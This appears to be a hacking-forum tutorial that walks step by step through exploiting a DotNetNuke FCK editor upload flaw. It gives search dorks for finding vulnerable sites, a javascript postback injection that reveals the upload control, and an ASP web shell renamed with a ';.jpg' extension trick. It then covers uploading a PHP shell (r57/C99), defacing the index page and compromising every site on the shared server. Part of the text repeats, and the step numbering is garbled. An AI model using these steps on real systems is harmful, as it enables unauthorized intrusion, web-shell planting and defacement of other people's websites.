Hello everyone!!
I am going to tell about Dot net nuke exploit.I know some of you know about it but it is very good exploit to hack dot net sites.it is fucking exploit.you can even hack all sites hosted on same server.You can upload any file using it.
Is it easy??? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting.
What is DNN ?
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.
I am going to tell about Dot net nuke exploit.I know some of you know about it but it is very good exploit to hack dot net sites.it is fucking exploit.you can even hack all sites hosted on same server.You can upload any file using it.
Is it easy??? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting.
What is DNN ?
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.
Here is step by step tutorial:
Upload random file
Code:
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png,
*.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg,
*.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vobstep 1:use this dork to find vulnerable site
Code:
inurl:home/tabid/36/language/en-US/Default.aspx
Code:
inurl:fcklinkgallery.aspx
inurl:/portals/0
Spoiler (Click to Hide)
![[Image: temp1nd.jpg]](http://img406.imageshack.us/img406/1118/temp1nd.jpg)
step 2:now open any site like
Code:
http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspxso your url will become
Code:
http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxand if you are lucky you will get this
Spoiler (Click to Hide)
![[Image: temp2x.jpg]](http://img266.imageshack.us/img266/6254/temp2x.jpg)
step 3:Select 3rd option[file]
Spoiler (Click to Hide)
![[Image: temp3.jpg]](http://img804.imageshack.us/img804/4636/temp3.jpg)
step 4: inject the following java code in browser address bar
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
Spoiler (Click to Hide)
![[Image: temp4.jpg]](http://img830.imageshack.us/img830/3241/temp4.jpg)
step 4:Now just upload your file for example mine is z.txt.when it is uploaded we can see it in root dir.
Spoiler (Click to Hide)
![[Image: temp5.jpg]](http://img864.imageshack.us/img864/9372/temp5.jpg)
step 5:Navigate to
Code:
http://www.vulsite.com/portals/0/z.txt
Spoiler (Click to Hide)
![[Image: temp6h.jpg]](http://img406.imageshack.us/img406/2483/temp6h.jpg)
You can see our file successfully uploaded.
method to upload shell:
Things you need:
An ASP shell
r57 or C99 Shell or anyother shell
step 4:rename your asp shell to
Code:
yourshell.asp;.jpgstep 5:Navigate it through
Code:
http://www.vulsite.com/portals/0/yourshell.asp;.jpg
Spoiler (Click to Hide)
![[Image: temp7.jpg]](http://img441.imageshack.us/img441/224/temp7.jpg)
step 6:Now upload your php shell using upload file option marked in above image.
step 7:Navigate it through
Code:
http://www.vulsite.com/portals/0/yourphpshell.php
Deface
step 8:Now replace your index.html with original index.html.Thats it.
all sites in server
Well you can hack all sites hosted on same server.
Spoiler (Click to Hide)
![[Image: temp8.jpg]](http://img594.imageshack.us/img594/3659/temp8.jpg)
